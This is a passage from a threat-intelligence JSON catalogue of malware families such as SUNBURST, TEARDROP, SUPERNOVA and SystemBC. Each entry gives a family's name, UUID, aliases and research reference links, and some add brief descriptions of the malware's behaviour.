"https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714", "https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/", "https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/", "https://twitter.com/cybercdh/status/1338975171093336067", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds", "https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data", "https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update", "https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/", "https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f", "https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q", "https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/", "https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html", "https://www.4hou.com/posts/KzZR", "https://www.comae.com/posts/sunburst-memory-analysis/", "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more", "https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947", "https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs", "https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095", "https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection", "https://twitter.com/KimZetter/status/1338305089597964290", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga", "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/", "https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection", "https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/", "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", "https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/", "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/", "https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf", "https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/", "https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/", "https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling", "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate", "https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html", "https://www.youtube.com/watch?v=JoMwrkijTZ8", "https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar", "https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf", "https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/", "https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure", "https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/", "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/", "https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action", "https://securelist.com/sunburst-backdoor-kazuar/99981/", "https://pastebin.com/6EDgCKxd", "https://www.youtube.com/watch?v=mbGN1xqy1jY", "https://www.solarwinds.com/securityadvisory/faq", "https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack", "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html", "https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack", "https://twitter.com/FireEye/status/1339295983583244302", "https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha", "https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a", "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", "https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/", "https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/", "https://youtu.be/Ta_vatZ24Cs?t=59", "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.cadosecurity.com/post/responding-to-solarigate", "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach", "https://www.microsoft.com/security/blog/2021/01/14/increasing-resilience-against-solorigate-and-other-sophisticated-attacks-with-microsoft-defender/", "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/", "https://twitter.com/ItsReallyNick/status/1338382939835478016", "https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/", "https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth", "https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q", "https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html", "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718", "https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/", "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline", "https://www.youtube.com/watch?v=LA-XE5Jy2kU", "https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/", "https://netresec.com/?b=2113a6a", "https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response", "https://www.fireeye.com/current-threats/sunburst-malware.html", "https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html", "https://github.com/fireeye/sunburst_countermeasures", "https://twitter.com/Intel471Inc/status/1339233255741120513", "https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control", "https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html", "https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/", "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610", "https://github.com/SentineLabs/SolarWinds_Countermeasures", "https://www.mimecast.com/blog/important-security-update/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection", "https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html", "https://twitter.com/lordx64/status/1338526166051934213", "https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS", "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", "https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc", "https://github.com/fireeye/Mandiant-Azure-AD-Investigator", "https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/", "https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/", "https://twitter.com/cybercdh/status/1338885244246765569", "https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/", "https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/", "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", "https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/", "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/", "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware" ], "synonyms": [ "Solorigate" ], "type": [] }, "uuid": "34e50688-6955-4c28-8e18-50252e5ea711", "value": "SUNBURST" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", "https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83", "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt", "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer" ], "synonyms": [], "type": [] }, "uuid": "018fb88b-a3cd-46b7-adea-a5b85302715b", "value": "SunCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" ], "synonyms": [], "type": [] }, "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", "value": "SunOrcal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova", "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html", "https://github.com/fireeye/sunburst_countermeasures", "https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", "https://www.anquanke.com/post/id/226029", "https://www.solarwinds.com/securityadvisory/faq", "https://www.solarwinds.com/securityadvisory", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a", "https://unit42.paloaltonetworks.com/solarstorm-supernova/", "https://github.com/fireeye/sunburst_countermeasures/pull/5", "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", "https://www.youtube.com/watch?v=7WX5fCEzTlA", "https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group", "https://twitter.com/MalwareRE/status/1342888881373503488", "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", "https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html" ], "synonyms": [], "type": [] }, "uuid": "62674a18-54c6-4c57-84cc-ea6a3bb2d6d6", "value": "SUPERNOVA" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox", "https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1", "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf", "https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim", "https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us" ], "synonyms": [ "Bayrob", "Nivdort" ], "type": [] }, "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", "value": "SuppoBox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.surtr", "https://citizenlab.ca/2013/08/surtr-malware-family-targeting-the-tibetan-community/" ], "synonyms": [], "type": [] }, "uuid": "8666afcc-8cc2-4856-83de-b7e8b4309367", "value": "surtr" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.swen", "https://en.wikipedia.org/wiki/Swen_(computer_worm)" ], "synonyms": [], "type": [] }, "uuid": "63657a3b-1f8f-422d-80de-fe4644f5d7ba", "value": "swen" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", "value": "Sword" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", "https://community.rsa.com/thread/185437", "https://www.secureworks.com/research/threat-profiles/bronze-edison", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", "https://www.symantec.com/connect/blogs/sykipot-attacks" ], "synonyms": [ "Wkysol", "getkys" ], "type": [] }, "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", "value": "sykipot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" ], "synonyms": [], "type": [] }, "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", "value": "SynAck" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt", "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" ], "synonyms": [], "type": [] }, "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", "value": "SyncCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", "value": "SynFlooder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader" ], "synonyms": [], "type": [] }, "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", "value": "Synth Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", "value": "Sys10" }, { "description": "SYSCON is a Remote Access Trojan used in a targeted champing against US government agencies. It has been recently observed in conjunction with CARROTBAT and CARROTBALL downloaders and it uses the File Transfer Protocol as Command and Control channel. Use of the family is attributed by Unit 42 to the Konni Group. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/", "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/" ], "synonyms": [], "type": [] }, "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", "value": "Syscon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" ], "synonyms": [], "type": [] }, "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", "value": "SysGet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.syskit", "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897", "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html", "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain", "https://twitter.com/QW5kcmV3/status/1176861114535165952" ], "synonyms": [ "IvizTech", "MANGOPUNCH" ], "type": [] }, "uuid": "4922f27b-a97c-4d6b-9425-1705f4716ee0", "value": "SysKit" }, { "description": "Sysraw stealer got its name because at some point, it was started as \"ZSysRaw\\sysraw.exe\". PDB strings suggest the name \"Clipsa\" though. First stage connects to /WPCoreLog/, the second one to /WPSecurity/. Its behavior suggest that it is an info stealer. It creates a rather large amount of files in a subdirectory (e.g. data) named \"1?[-+].dat\" and POSTs them.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer", "https://decoded.avast.io/janrubin/clipsa-multipurpose-password-stealer/", "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/" ], "synonyms": [ "Clipsa" ], "type": [] }, "uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947", "value": "Sysraw Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan" ], "synonyms": [], "type": [] }, "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", "value": "SysScan" }, { "description": "SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on a underground marketplace, Proofpoint decided to call it SystemBC.\r\n\r\nSystemBC has been observed occasionally, but more pronounced since June 2019. First samples goes back to October 2018.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc", "https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits", "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", "https://news.sophos.com/en-us/2020/12/16/systembc/" ], "synonyms": [], "type": [] }, "uuid": "cd0ad49d-7f79-45e0-91ba-c5eecdabe3aa", "value": "SystemBC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel", "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", "https://www.secureworks.com/research/srizbi" ], "synonyms": [], "type": [] }, "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", "value": "Szribi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", "value": "TabMsgSQL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a", "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html", "https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat", "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf" ], "synonyms": [ "simbot" ], "type": [] }, "uuid": "94323b32-9566-450b-8480-5f9f53b57948", "value": "taidoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taintedscribe", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133b", "https://blog.reversinglabs.com/blog/hidden-cobra" ], "synonyms": [], "type": [] }, "uuid": "014940fb-6e31-408a-962f-71914d0eb2f5", "value": "TAINTEDSCRIBE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" ], "synonyms": [], "type": [] }, "uuid": "b0467c03-824f-4071-8668-f056110d2a50", "value": "Taleret" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" ], "synonyms": [], "type": [] }, "uuid": "88ff523e-206b-4918-8c93-e2829427eef2", "value": "Tandfuy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux" ], "synonyms": [], "type": [] }, "uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410", "value": "Tapaoux" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", "value": "Tarsip" }, { "description": "According to Zscaler, Taurus is a stealer that surfaced in June 2020. It is being developed by the author(s) that previously created Predator the Thief. The name overlaps partly with the StealerOne / Terra* family (also aliased Taurus Loader) but appears to be a completely disjunct project.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer", "https://www.zscaler.com/blogs/research/taurus-new-stealer-town", "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md" ], "synonyms": [], "type": [] }, "uuid": "68b89458-f78e-41b3-b0ee-c193aaa948f9", "value": "Taurus Stealer" }, { "description": "Steve Miller pointed out that it is proxy-aware (Tencent) for C&C communication and uses wolfSSL, which makes it stick out.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient", "https://twitter.com/stvemillertime/status/1266050369370677249" ], "synonyms": [ "FIRESHADOW" ], "type": [] }, "uuid": "fc551237-8db7-4cfd-a915-9e8410abb313", "value": "TClient" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf", "https://securityintelligence.com/hammertoss-what-me-worry/", "https://www.youtube.com/watch?v=UE9suwyuic8" ], "synonyms": [ "HAMMERTOSS", "HammerDuke" ], "type": [] }, "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", "value": "tDiscoverer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess", "http://www.clearskysec.com/tulip/" ], "synonyms": [], "type": [] }, "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", "value": "TDTESS" }, { "description": "Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer.\r\nThis is achieved by sideloading another DLL among the legit TeamViewer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot", "https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/" ], "synonyms": [ "FINTEAM" ], "type": [] }, "uuid": "045469d0-5bb2-4ed9-9ee2-a0a08f437433", "value": "TeamBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy", "https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging", "https://www.cyber.nj.gov/threat-center/threat-profiles/trojan-variants/spy-agent" ], "synonyms": [ "TVRAT", "TVSPY", "TeamViewerENT" ], "type": [] }, "uuid": "9a82b6f6-2fdf-47bc-af05-cf7ce225fc96", "value": "TeamSpy" }, { "description": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop", "https://www.brighttalk.com/webcast/7451/462719", "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", "https://twitter.com/craiu/status/1339954817247158272", "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline", "https://www.youtube.com/watch?v=LA-XE5Jy2kU", "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/", "https://github.com/fireeye/sunburst_countermeasures", "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more", "https://twitter.com/TheEnergyStory/status/1346096298311741440", "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b", "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", "https://twitter.com/TheEnergyStory/status/1342041055563313152", "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/", "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714", "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware", "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate" ], "synonyms": [], "type": [] }, "uuid": "efa01fef-7faf-4bb2-8630-b3a237df882a", "value": "TEARDROP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tefosteal", "https://twitter.com/WDSecurity/status/1105990738993504256" ], "synonyms": [], "type": [] }, "uuid": "aaa05037-aee1-4353-ace1-43ae0f558091", "value": "TefoSteal" }, { "description": "According to Check Point, this is a Telegram-focused infostealer (FTP / Delphi) used to target Iranian expats and dissidents.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telandext", "https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/" ], "synonyms": [], "type": [] }, "uuid": "b2b5a816-2268-4cb8-9958-491356c452ec", "value": "TelAndExt" }, { "description": "According to Check Point, this is a Telegram-focused infostealer (SOAP / Delphi) used to target Iranian expats and dissidents.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telb", "https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/" ], "synonyms": [], "type": [] }, 